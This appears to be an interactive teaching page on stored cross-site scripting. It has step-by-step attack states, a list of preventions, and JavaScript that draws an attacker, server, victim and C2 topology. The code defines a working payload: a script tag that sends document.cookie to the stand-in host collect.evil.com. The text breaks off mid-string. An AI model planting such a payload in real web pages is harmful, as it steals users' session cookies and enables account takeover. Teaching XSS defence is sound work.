Cross-Site Scripting - Stored XSS

In a stored XSS attack, malicious JavaScript is permanently stored on the target server and executes in every victim's browser who views the infected page. It is one of the most dangerous web vulnerabilities.

Ready Click Next Step to watch a stored XSS attack unfold step by step.

Attack State

Attacker Scanning

Victim Safe

Payload

XSS Payload -

Stolen Data -

Prevention

HTML encode output
Use Content-Security-Policy
HttpOnly cookies
Input validation

Event Log

const svg = document.getElementById('topology'); const W = 700, H = 420; const NODES = { attacker: { x: 120, y: 110, color: '#ff7b72', label: 'Attacker', sub: 'evil.com' }, server: { x: 420, y: 110, color: '#e3b341', label: 'Vulnerable Server', sub: 'forum.example.com' }, db: { x: 420, y: 280, color: '#bc8cff', label: 'Database', sub: 'MySQL' }, victim: { x: 120, y: 280, color: '#58a6ff', label: 'Victim Browser', sub: "Alice's Chrome" }, c2: { x: 600, y: 195, color: '#ff7b72', label: 'Attacker C2', sub: 'collect.evil.com' }, }; const PAYLOAD = "<script>fetch('https://collect.evil.com/steal?c='+document.cookie)</script>"; const PAYLOAD_RAW = "